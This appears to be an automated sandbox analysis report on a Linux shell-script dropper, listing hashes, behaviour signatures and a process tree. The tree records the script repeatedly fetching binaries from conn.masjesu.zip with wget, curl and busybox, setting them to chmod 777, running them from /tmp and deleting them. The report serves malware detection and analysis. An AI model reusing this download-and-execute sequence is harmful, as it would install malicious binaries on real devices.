Analysis
max time kernel: 124s
max time network: 144s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 29/10/2024, 02:30
Static task: static1
Behavioral task: behavioral1
  Sample: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
  Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
  Sample: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
  Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
  Sample: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
  Resource: debian9-mipsel-20240226-en
General
Target: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh
Size: 10KB
MD5: d41afa47fc6a06a1cfb7b25f1b6510db
SHA1: 1ef345877ccc2780055713bec262b92657b1e4a1
SHA256: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
SHA512: 5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
SSDEEP: 96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures

File and Directory Permissions Modification (1 TTPs, 17 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Process chmod, pids: 892, 900, 922, 931, 766, 788, 875, 907, 914, 739, 884, 939, 747, 814, 826, 833, 849

Executes dropped EXE (17 IoCs)
ioc  |  pid  |  Process
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  740  |  QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  748  |  BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  767  |  37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  789  |  VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  816  |  fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  827  |  5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  834  |  NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  850  |  HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  876  |  gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  885  |  Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  893  |  hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  901  |  XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  908  |  nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  915  |  DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  923  |  QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  932  |  BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  940  |  37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F

Reads runtime system information
description: File opened for reading  |  ioc: /proc/sys/crypto/fips_enabled  |  Process: curl
(the same entry is recorded 18 times, once per curl process in the tree below)

System Network Configuration Discovery (1 TTPs, 53 IoCs)
Adversaries may gather information about the network configuration of a system.
Process wget, pids: 910, 771, 793, 855, 888, 829, 820, 743, 925, 715, 896, 918, 943, 880, 751, 836, 935, 903
Process curl, pids: 911, 926, 744, 897, 776, 830, 752, 944, 936, 881, 889, 822, 861, 904, 919, 837, 799, 724
Process busybox, pids: 832, 913, 929, 906, 938, 761, 785, 812, 921, 737, 899, 845, 870, 883, 746, 825, 891

Writes file to tmp directory (17 IoCs)
Malware often drops required files in the /tmp directory.
description: File opened for modification  |  Process: curl  |  ioc:
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
Processes
(image  |  command line  |  PID; indentation shows tree depth, signatures listed under each process)

/tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh  |  /tmp/754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a.sh  |  PID:707
    /bin/rm  |  /bin/rm bins.sh  |  PID:713
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:715
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:724
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:737
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:739
        File and Directory Permissions Modification
    /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  ./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:740
        Executes dropped EXE
    /bin/rm  |  rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:742
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:743
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:744
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:746
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:747
        File and Directory Permissions Modification
    /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:748
        Executes dropped EXE
    /bin/rm  |  rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:750
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:751
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:752
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:761
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:766
        File and Directory Permissions Modification
    /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  ./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:767
        Executes dropped EXE
    /bin/rm  |  rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:769
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:771
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:776
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:785
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:788
        File and Directory Permissions Modification
    /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  ./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:789
        Executes dropped EXE
    /bin/rm  |  rm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:791
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:793
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:799
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:812
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:814
        File and Directory Permissions Modification
    /tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  ./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:816
        Executes dropped EXE
    /bin/rm  |  rm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3  |  PID:819
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:820
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:822
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:825
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:826
        File and Directory Permissions Modification
    /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  ./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:827
        Executes dropped EXE
    /bin/rm  |  rm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP  |  PID:828
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:829
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:830
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:832
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:833
        File and Directory Permissions Modification
    /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  ./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:834
        Executes dropped EXE
    /bin/rm  |  rm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q  |  PID:835
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:836
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:837
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:845
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:849
        File and Directory Permissions Modification
    /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  ./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:850
        Executes dropped EXE
    /bin/rm  |  rm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB  |  PID:853
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:855
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:861
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:870
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:875
        File and Directory Permissions Modification
    /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  ./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:876
        Executes dropped EXE
    /bin/rm  |  rm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6  |  PID:879
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:880
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:881
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:883
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:884
        File and Directory Permissions Modification
    /tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  ./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:885
        Executes dropped EXE
    /bin/rm  |  rm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em  |  PID:887
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:888
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:889
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:891
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:892
        File and Directory Permissions Modification
    /tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:893
        Executes dropped EXE
    /bin/rm  |  rm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ  |  PID:895
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:896
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:897
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:899
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:900
        File and Directory Permissions Modification
    /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  ./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:901
        Executes dropped EXE
    /bin/rm  |  rm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx  |  PID:902
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:903
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:904
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:906
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:907
        File and Directory Permissions Modification
    /tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  ./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:908
        Executes dropped EXE
    /bin/rm  |  rm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD  |  PID:909
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:910
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:911
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:913
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:914
        File and Directory Permissions Modification
    /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  ./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:915
        Executes dropped EXE
    /bin/rm  |  rm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l  |  PID:917
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:918
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:919
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:921
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:922
        File and Directory Permissions Modification
    /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  ./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:923
        Executes dropped EXE
    /bin/rm  |  rm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA  |  PID:924
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:925
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:926
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:929
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:931
        File and Directory Permissions Modification
    /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:932
        Executes dropped EXE
    /bin/rm  |  rm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ  |  PID:934
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:935
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:936
        Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    /bin/busybox  |  /bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:938
        System Network Configuration Discovery
    /bin/chmod  |  chmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:939
        File and Directory Permissions Modification
    /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  ./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:940
        Executes dropped EXE
    /bin/rm  |  rm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F  |  PID:942
    /usr/bin/wget  |  wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:943
        System Network Configuration Discovery
    /usr/bin/curl  |  curl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw  |  PID:944
        Reads runtime system information; System Network Configuration Discovery
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 16B
MD5: 7689ca8c5bc85cf6b78ef89323d4df6a
SHA1: a1392ec3b571b3de167f0b9a5dadab4f14a2db76
SHA256: 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5
SHA512: 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97